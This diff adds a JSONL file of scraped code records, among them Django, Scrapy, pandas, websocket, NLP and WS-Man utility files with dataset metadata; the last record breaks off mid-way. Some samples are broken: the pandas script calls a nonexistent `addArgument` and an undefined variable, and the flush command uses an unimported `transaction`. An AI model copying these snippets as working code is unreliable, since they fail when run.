diff --git "a/057.jsonl" "b/057.jsonl" new file mode 100644--- /dev/null +++ "b/057.jsonl" @@ -0,0 +1,483 @@ +{"seq_id": "112954021", "text": "from celery import shared_task\nfrom django.core.mail import send_mail\n\n\n@shared_task\ndef send_email(receive):\n\n subject = 'yes'\n message = 'really'\n form_email = 'rongjiawei1204@163.com'\n recipient_list = (receive,)\n send_mail(subject=subject, message=message,from_email=form_email,recipient_list=recipient_list)\n", "sub_path": "Code/DjangoProject/RESTEnd/sendemail/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 328, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.core.mail.send_mail", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.shared_task", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "138065892", "text": "import pandas as pd\nimport os\nimport sys\nimport argparse\n\ndef one_year_csv_writer(this_year, all_data, output):\n \"\"\"\n Writes a csv file for data from a given year.\n\n this_year --- year for which data is extracted\n all_data --- DataFrame with multi-year data\n \"\"\"\n \n # Select data for the year\n surveys_year = all_data[all_data.year == this_year]\n\n # Write the new DataFrame to a csv file\n filename = output + str(this_year) + '.csv'\n surveys_year.to_csv(filename)\n\ndef output_test(test_dir):\n \"\"\"\n Check to see if an output directory exists.\n If it exists, tell us.\n If it doesn't, create one, and tell us.\n \"\"\"\n test_split = test_dir.split('/')\n check_directory = test_split[0] + '/' + test_split[1] + '/'\n if test_split[2] in os.listdir(check_directory):\n print('Processed directory exists')\n else:\n# output_directory = '/'.join(test_split[0:-1])\n output_directory = test_split[0] + '/' + test_split[1] + '/' + test_split[2]\n print(output_directory)\n os.mkdir(output_directory)\n print('Processed directory created')\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.addArgument(\"--dataset\", help = \"CSV containing data for multiple years.\")\n parser.addArgument(\"--output\", help = \"Where do you want to write output?\")\n parser.addArgument(\"--year\", help = \"Which year do you want to analyze?\")\n args = parser.parse_args()\n if args.dataset:\n surveys_df = args.dataset\n if args.output:\n test_dir = args.output\n if args.year:\n this_year = args.year\n surveys_df = pd.read_csv(surveys_df)\n output_test(test_dir)\n one_year_csv_writer(all_data = surveys_df, this_year = data_year, output = test_dir) \n print(\"Victory.\")", "sub_path": "scripts/my_first_script.py", "file_name": "my_first_script.py", "file_ext": "py", "file_size_in_byte": 1799, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 29, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 35, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "309556162", "text": "from scrapy import Request\nfrom scrapy.spiders import Spider\nfrom spider_meizitu.items import SpiderMeizituItem\nimport re\n\n\nclass MeizituSpider(Spider):\n name = 'meizitu'\n\n start_urls = {\n 'http://www.meizitu.com/a/sexy.html',\n }\n\n def parse(self, response):\n self.logger.info('Parse function called on %s', response.url)\n meizi_pic_lists = response.xpath('//ul[@class=\"wp-list clearfix\"]/li')\n for meizi_item in meizi_pic_lists:\n meizi_item_url = meizi_item.xpath('.//h3[@class=\"tit\"]/a/@href').extract()[0]\n # print('===== 当前爬取页面共有图片%s组,正在抓取第%s组图片,页面链接:: %s =====' % (len(meizi_pic_lists), i + 1, meizi_item_url))\n yield Request(meizi_item_url, callback=self.parse_meizi_pic)\n\n # next_url = re.findall('下一页', response.xpath('//*[@id=\"wp_page_numbers\"]').extract()[0])\n # if next_url:\n # # next_url = 'http://www.meizitu.com/a/' + next_url[0]\n # # print('========== Request Next Url :: %s ==========' % next_url)\n # next_url = 'http://www.meizitu.com/a/' + next_url[0]\n # yield response.follow(next_url, callback=self.parse)\n\n def parse_meizi_pic(self, response):\n self.logger.info('Parse function called on %s', response.url)\n item = SpiderMeizituItem()\n item['group'] = response.xpath(\"//div[@class='metaRight']/h2/a/text()\").extract()[0]\n meizitu_pics = response.xpath('//div[@id=\"picture\"]/p/img')\n for meizitu_pic in meizitu_pics:\n item['name'] = meizitu_pic.xpath('.//@alt').extract()[0]\n item['url'] = meizitu_pic.xpath('.//@src').extract()[0]\n # print('===== 当前页面共有图片%s张,正在抓取第%s张图��,图片链接:: %s =====' % (len(meizitu_pics), i + 1, item['image_urls']))\n yield item\n", "sub_path": "spider_meizitu/spider_meizitu/spiders/spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 1904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "scrapy.spiders.Spider", "line_number": 7, "usage_type": "name"}, {"api_name": "scrapy.Request", "line_number": 20, "usage_type": "call"}, {"api_name": "spider_meizitu.items.SpiderMeizituItem", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "430201199", "text": "import sys\nfrom importlib import import_module\nimport click\n\nfrom orun.utils import reraise\nfrom orun.apps import apps\nfrom orun.core.management.color import no_style\nfrom orun.core.management.sql import emit_post_migrate_signal, sql_flush\nfrom orun.db import DEFAULT_DB_ALIAS, connections #, transaction\n\n\n@click.command('flush')\n@click.option('--database', '-db')\n@click.option('--verbosity', '-v')\n@click.option('--interactive', '-i')\n@click.option('--reset-sequences', '-r')\n@click.option('--allow-cascade', '-c')\n@click.option('--inhibit-post-migrate', '-ipm')\ndef command(self, database, verbosity, interactive, reset_sequences, allow_cascade, inhibit_post_migrate):\n connection = connections[database]\n\n self.style = no_style()\n\n # Import the 'management' module within each installed app, to register\n # dispatcher events.\n for app_config in apps.get_app_configs():\n try:\n import_module('.management', app_config.name)\n except ImportError:\n pass\n\n sql_list = sql_flush(self.style, connection, only_orun=True,\n reset_sequences=reset_sequences,\n allow_cascade=allow_cascade)\n\n if interactive:\n confirm = input(\"\"\"You have requested a flush of the database.\nThis will IRREVERSIBLY DESTROY all data currently in the %r database,\nand return each table to an empty state.\nAre you sure you want to do this?\n\nType 'yes' to continue, or 'no' to cancel: \"\"\" % connection.settings_dict['NAME'])\n else:\n confirm = 'yes'\n\n if confirm == 'yes':\n try:\n with transaction.atomic(using=database,\n savepoint=connection.features.can_rollback_ddl):\n with connection.cursor() as cursor:\n for sql in sql_list:\n cursor.execute(sql)\n except Exception as e:\n new_msg = (\n \"Database %s couldn't be flushed. Possible reasons:\\n\"\n \" * The database isn't running or isn't configured correctly.\\n\"\n \" * At least one of the expected database tables doesn't exist.\\n\"\n \" * The SQL was invalid.\\n\"\n \"Hint: Look at the output of 'orun-admin sqlflush'. \"\n \"That's the SQL this command wasn't able to run.\\n\"\n \"The full error: %s\") % (connection.settings_dict['NAME'], e)\n reraise(click.UsageError, click.UsageError(new_msg), sys.exc_info()[2])\n\n # Empty sql_list may signify an empty database and post_migrate would then crash\n if sql_list and not inhibit_post_migrate:\n # Emit the post migrate signal. This allows individual applications to\n # respond as if the database had been migrated from scratch.\n emit_post_migrate_signal(verbosity, interactive, database)\n else:\n self.stdout.write(\"Flush cancelled.\\n\")\n", "sub_path": "orun/core/management/commands/flush.py", "file_name": "flush.py", "file_ext": "py", "file_size_in_byte": 2913, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "orun.db.connections", "line_number": 20, "usage_type": "name"}, {"api_name": "orun.core.management.color.no_style", "line_number": 22, "usage_type": "call"}, {"api_name": "orun.apps.apps.get_app_configs", "line_number": 26, "usage_type": "call"}, {"api_name": "orun.apps.apps", "line_number": 26, "usage_type": "name"}, {"api_name": "importlib.import_module", "line_number": 28, "usage_type": "call"}, {"api_name": "orun.core.management.sql.sql_flush", "line_number": 32, "usage_type": "call"}, {"api_name": "orun.utils.reraise", "line_number": 62, "usage_type": "call"}, {"api_name": "click.UsageError", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 62, "usage_type": "call"}, {"api_name": "orun.core.management.sql.emit_post_migrate_signal", "line_number": 68, "usage_type": "call"}, {"api_name": "click.command", "line_number": 12, "usage_type": "call"}, {"api_name": "click.option", "line_number": 13, "usage_type": "call"}, {"api_name": "click.option", "line_number": 14, "usage_type": "call"}, {"api_name": "click.option", "line_number": 15, "usage_type": "call"}, {"api_name": "click.option", "line_number": 16, "usage_type": "call"}, {"api_name": "click.option", "line_number": 17, "usage_type": "call"}, {"api_name": "click.option", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "569252916", "text": "# Copyright 2019-2021 Wingify Software Pvt. Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\" Module for making requests, uses requests internally \"\"\"\n\nimport requests\n\n\nclass Connection:\n \"\"\" Connection class to provide SDK with network connectivity interfaces \"\"\"\n\n def __init__(self):\n \"\"\" Initializes connection class with requests session object\"\"\"\n self.session = requests.Session()\n\n def get(self, url, params=None):\n \"\"\" Get method, it wraps upon requests' get method.\n Args:\n url (str): Unique resource locator\n params (dict): Parameters to be passed\n Returns:\n dict : Status code and Response text\n \"\"\"\n try:\n resp = self.session.get(url, params=params)\n return {\"status_code\": resp.status_code, \"text\": resp.text}\n except Exception:\n return {\"status_code\": None, \"text\": \"\"}\n\n def post(self, url, params=None, data=None, headers=None):\n \"\"\" Post method, it wraps upon requests' post method.\n Args:\n url (str): Unique resource locator\n params (dict): Parameters to be passed\n data (dict): Json data to be passed\n headers (dict): Headers for request\n Returns:\n dict : Status code and Response text\n \"\"\"\n try:\n resp = self.session.post(url, params=params, json=data, headers=headers)\n\n return {\"status_code\": resp.status_code, \"text\": resp.text}\n except Exception:\n return {\"status_code\": None, \"text\": \"\"}\n", "sub_path": "vwo/http/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 2084, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.Session", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "370914691", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.models import User\n\nfrom .models import Post, Category\nfrom .forms import CatTransferForm\n\n\ndef category(request, slug=None):\n if slug:\n instance = get_object_or_404(Category, slug=slug)\n all_posts = Post.published_objects.filter(category=instance)\n else:\n instance = None\n all_posts = Post.published_objects.all()\n\n ctx = {'category': instance, 'posts': all_posts}\n return render(request, 'category.html', ctx)\n\n\ndef post(request, year, month, slug):\n article = get_object_or_404(Post, publish__year=year,\n publish__month=month, slug=slug)\n ctx = {'article': article}\n return render(request, 'article.html', ctx)\n\n\ndef user_posts(request, userid):\n user = get_object_or_404(User, id=userid)\n all_posts = Post.objects.filter(author=user, publish__isnull=False)\n\n ctx = {'author': user, 'posts': all_posts}\n return render(request, 'category.html', ctx)\n\n\n@staff_member_required\ndef transfer_posts_tool(request):\n if request.method == 'POST':\n form = CatTransferForm(request.POST)\n if form.is_valid():\n Post.objects.filter(category__in=form.cleaned_data['from_cats']).update(\n category=form.cleaned_data['to_cat'])\n\n else:\n form = CatTransferForm()\n\n ctx = {\n 'form': form,\n }\n return render(request, 'transfer_tool.html', ctx)\n", "sub_path": "mtlpy/blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 11, "usage_type": "argument"}, {"api_name": "models.Post.published_objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Post.published_objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Post.published_objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Post.published_objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 29, "usage_type": "argument"}, {"api_name": "models.Post.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 30, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.CatTransferForm", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Post.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 41, "usage_type": "name"}, {"api_name": "forms.CatTransferForm", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.admin.views.decorators.staff_member_required", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "61859599", "text": "from websocket import WebSocketApp\r\nfrom threading import Thread\r\nimport json\r\nimport time\r\n\r\ndef on_message(ws, msg):\r\n msg = json.loads(msg.decode('utf-8'))\r\n print(msg)\r\n\r\ndef on_error(ws, msg):\r\n print(msg)\r\n\r\ndef on_close(ws):\r\n print('close')\r\n\r\ndef on_open(ws):\r\n def run(*args):\r\n request = '[{\"ticket\":\"\"},{\"type\":\"ticker\",\"codes\":[\"KRW-BTC\"]}]'\r\n ws.send(request)\r\n time.sleep(5)\r\n ws.close\r\n\r\n th = Thread(target=run, daemon=True)\r\n th.start()\r\n\r\nif __name__ == \"__main__\":\r\n ws = WebSocketApp(\"wss://api.upbit.com/websocket/v1\",\r\n on_message=on_message,\r\n on_error=on_error,\r\n on_close=on_close,\r\n on_open=on_open)\r\n ws.run_forever()", "sub_path": "coin/upbit_ws.py", "file_name": "upbit_ws.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.loads", "line_number": 7, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 23, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "13952149", "text": "from nltk import *\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import RegexpTokenizer\nfrom stop_words import get_stop_words\nfrom nltk.stem.porter import PorterStemmer\nfrom gensim import corpora, models\nimport gensim\nimport math\nimport PyPDF2\nimport timeit\nimport spacy\n\nnlp = spacy.load('en')\n\n# Initiate List for NER\nORG = []\nPERSON = []\nGPE_LOCATION = []\nMONEY = []\nTIME = []\nEVENT = []\nOTHER = []\n\nquestion_list = []\ntext = \"\"\"\nBertie Steffink, nephew of the aforementioned Luke, had early in life adopted the profession of\nne'er-do-weel; his father had been something of the kind before him. At the age of eighteen Bertie \nhad commenced that round of visits to our Colonial possessions, so seemly and desirable in the case \nof a Prince of the Blood, so suggestive of insincerity in a young man of the middle-class.\"\"\"\n\n# Replace the tokens to exclude the NER tokens\n# Not including the NER taggings in tokenization\n\n# SYSTEM CODE\n# PREPROCESSING\ntokenized_lda = word_tokenize(text)\n\n# Tokenized by sentence for LDA\nlda_sentence_tokens = []\nsentence = \"\"\ni = 0;\nfor word in tokenized_lda:\n sentence += \" \" + word\n if (word == '.'):\n lda_sentence_tokens.append(sentence)\n # printing every sentence in a text\n sentence = \"\"\n\n# LDA\n# Preprocess\ntokenizer = RegexpTokenizer(r'\\w+')\n\n# create English stop words list\nen_stop = get_stop_words('english')\n\n# Create p_stemmer of class PorterStemmer\np_stemmer = PorterStemmer()\n\n# compile sample documents into a list\ndoc_set = lda_sentence_tokens\n\n# list for tokenized documents in loop\ntexts = []\n\n# loop through document list\nfor i in doc_set:\n # clean and tokenize document string\n doc = nlp(i)\n\n for ent in doc.ents:\n if ent.label_ == 'ORG':\n ORG.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'PERSON':\n PERSON.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'GPE':\n GPE_LOCATION.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'MONEY':\n MONEY.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'TIME':\n TIME.append(ent.text)\n print(ent.text, ent.label_)\n elif ent.label_ == 'EVENT':\n EVENT.append(ent.text)\n print(ent.text, ent.label_)\n else:\n OTHER.append(ent.text)\n print(ent.text, ent.label_)\n\nNER = ORG + PERSON + GPE_LOCATION + MONEY + TIME + EVENT + OTHER\nif \" \" in NER:\n NER.remove(\" \")\nprint(NER)\n\nfor word in NER:\n\n for sentence in doc_set:\n\n if \"________\" in sentence:\n break\n elif word in sentence:\n question_list.append(sentence.replace(word, \"________\"))\nindex = 1\nfor question in question_list:\n print(str(index) + \"] \" +question)\n index += 1\n\"\"\"\nfor token in range(len(NER)):\n if NER[token] in i:\n i = i.replace(NER[token], \" tags\" + str(token) + \" \")\n\n raw = i.lower()\n tokens = tokenizer.tokenize(raw)\n\n for word in range(len(tokens)):\n for token in range(len(NER)):\n if tokens[word] == (\" tags\" + str(token) + \" \"):\n tokens[word] = NER[token]\n\n # remove stop words from tokens\n stopped_tokens = [i for i in tokens if not i in en_stop]\n\n # add tokens to list\n texts.append(stopped_tokens)\n\n# turn our tokenized documents into a id <-> term dictionary\ndictionary = corpora.Dictionary(texts)\n\n# convert tokenized documents into a document-term matrix\ncorpus = [dictionary.doc2bow(text) for text in texts]\n\n# generate LDA model\nldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=5, id2word=dictionary, passes=20)\nlda_raw = ldamodel.print_topics(num_topics=2, num_words=100)\n\ntry:\n # Preprocessing\n # Gathering each words in LDA\n\n nstr = re.sub(r'[+|\"\"|,|\\\\|'']', r'', str(lda_raw[1]))\n tokens = word_tokenize(nstr)\n\n lda_tokens = []\n for i in tokens:\n lda_tokens.append(str(i).split('*'))\n\n lda_words = []\n index = 0\n for i in lda_tokens:\n if index >= 2 and index < len(lda_tokens) - 2:\n lda_words.append(i[1])\n index += 1\n\n\n # Part-of-Speech Tagging in Templating is divided into two.\n # The POS tagging from LDA to filter out the topic in the corpora and the Original Copy which is the template that\n # change the\nexcept IndexError:\n print(\"Error Occur\")\n\n# from LDA\nlda_tagging = pos_tag(lda_words)\nprint(lda_tagging)\n\"\"\"", "sub_path": "LDA.py", "file_name": "LDA.py", "file_ext": "py", "file_size_in_byte": 4521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "spacy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.tokenize.RegexpTokenizer", "line_number": 51, "usage_type": "call"}, {"api_name": "stop_words.get_stop_words", "line_number": 54, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "401425513", "text": "#!/usr/bin/env python3\n# -*- encoding=utf-8 -*-\n\n# description:\n# author:jack\n# create_time: 2018/1/3\n\n\"\"\"\n desc:pass\n\"\"\"\nimport os\nimport logging\nimport traceback\nfrom dueros.Bot import Bot\nfrom dueros.card.TextCard import TextCard\nfrom dueros.card.ImageCard import ImageCard\nfrom dueros.card.StandardCard import StandardCard\nfrom dueros.samples.xichuangzhu.Poem import Poem\nfrom dueros.directive.BaseDirective import BaseDirective\nimport json\nimport random\n\nclass Bot(Bot):\n def launchRequest(self):\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n\n def nextIntentRequest(self):\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n\n def previousIntentRequest(self):\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n\n def seemoreIntentRequest(self):\n title = \"\"\n try:\n anchorText = (self._request.data[\"context\"][\"Screen\"][\"card\"][\"anchorText\"])\n except Exception as e:\n standardCard = self.get_one_poem_standardCard()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % standardCard.data[\"content\"]\n }\n base_directive = BaseDirective(\"Display.RenderSwanView\")\n poem_see_more = \"\"\n try:\n poem_see_more = Poem.get_see_more(gushiwen_url=anchorText)\n except Exception as e:\n print (traceback.print_exc())\n if poem_see_more:\n logging.info('poem_see_more:' + json.dumps(poem_see_more))\n standardCard = self.get_one_poem_standardCard()\n standardCard.data[\"title\"] = poem_see_more[\"chuzi\"]\n standardCard.data[\"content\"] = poem_see_more[\"text\"] + \"\\n\\n\" + poem_see_more[\"yiwen\"]\n standardCard.data[\"image\"] = Poem.get_one_random_image()\n return {\n 'card': standardCard,\n 'outputSpeech': ' %s ' % (poem_see_more[\"text\"])\n }\n else:\n return {\n 'outputSpeech': ' 抱歉, 未找到这首诗 '\n }\n\n def get_one_poem_standardCard(self):\n standardCard = StandardCard()\n one_poem_item = Poem.get_one_poem_item()\n standardCard.data[\"title\"] = one_poem_item[\"chuzi\"]\n standardCard.data[\"content\"] = one_poem_item[\"mingju\"]\n standardCard.data['anchorText'] = one_poem_item[\"url\"]\n standardCard.data[\"image\"] = Poem.get_one_random_image()\n return standardCard\n\n def __init__(self, data):\n super(Bot, self).__init__(data)\n\n self.add_launch_handler(self.launchRequest)\n\n self.add_intent_handler('ai.dueros.common.next_intent', self.nextIntentRequest)\n\n self.add_intent_handler('ai.dueros.common.previous_intent', self.previousIntentRequest)\n\n self.add_intent_handler('xichuangzhu----see_more_about_it', self.seemoreIntentRequest)\n \n\n pass\n\n\nif __name__ == '__main__':\n pass\n", "sub_path": "dueros/samples/xichuangzhu/Bot.py", "file_name": "Bot.py", "file_ext": "py", "file_size_in_byte": 3372, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dueros.directive.BaseDirective.BaseDirective", "line_number": 55, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_see_more", "line_number": 58, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 58, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 62, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_one_random_image", "line_number": 66, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 66, "usage_type": "name"}, {"api_name": "dueros.card.StandardCard.StandardCard", "line_number": 77, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_one_poem_item", "line_number": 78, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 78, "usage_type": "name"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem.get_one_random_image", "line_number": 82, "usage_type": "call"}, {"api_name": "dueros.samples.xichuangzhu.Poem.Poem", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "342886924", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nCommon functionalities for AMT Driver\n\"\"\"\nimport logging\nimport pywsman\nimport xmltodict\nfrom ast import literal_eval\nfrom xml.etree import ElementTree\nfrom wry import data_structures\nfrom wry import exceptions\nfrom wry.decorators import retry, add_client_options\nfrom wry.config import RESOURCE_URIs\nfrom wry.data_structures import _strip_namespace_prefixes, WryDict\n\n\n\n_SOAP_ENVELOPE = 'http://www.w3.org/2003/05/soap-envelope'\n\nLOG = logging.getLogger(__name__)\n\nAMT_PROTOCOL_PORT_MAP = {\n 'http': 16992,\n 'https': 16993,\n}\n\n\ndef _validate(doc, silent=False):\n if doc is None:\n raise exceptions.AMTConnectFailure\n if not silent:\n if doc.is_fault():\n raise exceptions.WSManFault(doc)\n return doc\n\n\n@add_client_options\n@retry\ndef wsman_get(client, resource_uri, options=None, silent=False):\n '''Get target server info'''\n doc = client.get(options, resource_uri)\n return _validate(doc, silent=silent)\n\n\n@add_client_options\n@retry\ndef wsman_pull(client, resource_uri, options=None, wsman_filter=None, context=None, silent=False):\n '''Get target server info'''\n doc = client.pull(options, wsman_filter, resource_uri, context)\n return _validate(doc, silent=silent)\n\n\n@add_client_options\n@retry\ndef wsman_enumerate(client, resource_uri, options=None, wsman_filter=None, silent=False):\n '''Get target server info'''\n doc = client.enumerate(options, wsman_filter, resource_uri)\n return _validate(doc, silent=silent)\n\n\n@add_client_options\n@retry\ndef wsman_put(client, resource_uri, data, options=None, silent=False):\n '''Invoke method on target server\n :param silent: Ignore WSMan errors, and return the document anyway. Does not\n ignore the endpoint being down.\n '''\n doc = client.put(options, resource_uri, str(data), len(data))\n return _validate(doc, silent=silent)\n\n@add_client_options\n@retry\ndef wsman_invoke(client, resource_uri, method, data=None, options=None, silent=False):\n '''Invoke method on target server.'''\n doc = client.invoke(options, resource_uri, str(method), pywsman.create_doc_from_string(str(data)))\n return _validate(doc, silent=silent)\n\n\ndef get_resource(client, resource_name, options=None):\n '''\n '''\n uri = RESOURCE_URIs[resource_name]\n doc = wsman_get(client, uri, options=options)\n return WryDict(doc)\n \n\ndef enumerate_resource(client, resource_name, wsman_filter=None, options=None):\n '''\n class.\n '''\n uri = RESOURCE_URIs[resource_name]\n doc = wsman_enumerate(client, uri, options=options) # Add in relevant kwargs... filter?\n doc = WryDict(doc)\n context = doc['EnumerateResponse']['EnumerationContext']\n ended = False\n output = {resource_name: []}\n while ended is False:\n doc = wsman_pull(client, uri, context=str(context), options=options)\n response = WryDict(doc)['PullResponse']\n ended = response.pop('EndOfSequence', False)\n output[resource_name].append(response['Items'][resource_name])\n return output\n\n\ndef put_resource(client, indict, options=None, uri=None, silent=False):\n '''\n Given a dict or describing a wsman resource, post this resource to the client.\n :returns: data_structures.WryDict\n :param indict: A dictionary or dictionary-like object (eg.\n common.RESOURCE_URIs.\n :param uri: If a mapping does not exist in common.RESOURCE_URIs, the resource URI can be specified manually here.\n :param mappings: A dictionary providing extra mappings between resource names and URIs.\n '''\n if not uri:\n uri = RESOURCE_URIs[indict.keys()[0]] # Possible to support multiple simply here?\n data = indict.as_xml()\n doc = wsman_put(client, uri, data, options=options, silent=silent)\n return WryDict(doc)\n\n\ndef invoke_method(client, method, input_dict, options=None):\n resource_name = input_dict.keys()[0]\n input_dict = WryDict(input_dict).with_namespaces()\n data = input_dict[resource_name]\n uri = data.pop(u'@xmlns')\n data.values()[0][u'@xmlns'] = uri\n xml = xmltodict.unparse(data, full_document=False, pretty=True)\n doc = wsman_invoke(client, RESOURCE_URIs[resource_name], method, xml, options=options)\n returned = WryDict(doc)\n return_value = returned[returned.keys()[0]]['ReturnValue']\n if return_value != 0:\n raise exceptions.NonZeroReturn(return_value)\n return returned\n\n", "sub_path": "wry/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 4906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 31, "usage_type": "call"}, {"api_name": "wry.exceptions.AMTConnectFailure", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wry.exceptions", "line_number": 41, "usage_type": "name"}, {"api_name": "wry.exceptions.WSManFault", "line_number": 44, "usage_type": "call"}, {"api_name": "wry.exceptions", "line_number": 44, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 48, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 49, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 56, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 57, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 64, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 65, "usage_type": "name"}, {"api_name": "wry.decorators.add_client_options", "line_number": 72, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 73, "usage_type": "name"}, {"api_name": "pywsman.create_doc_from_string", "line_number": 86, "usage_type": "call"}, {"api_name": "wry.decorators.add_client_options", "line_number": 82, "usage_type": "name"}, {"api_name": "wry.decorators.retry", "line_number": 83, "usage_type": "name"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 93, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 95, "usage_type": "call"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 102, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 104, "usage_type": 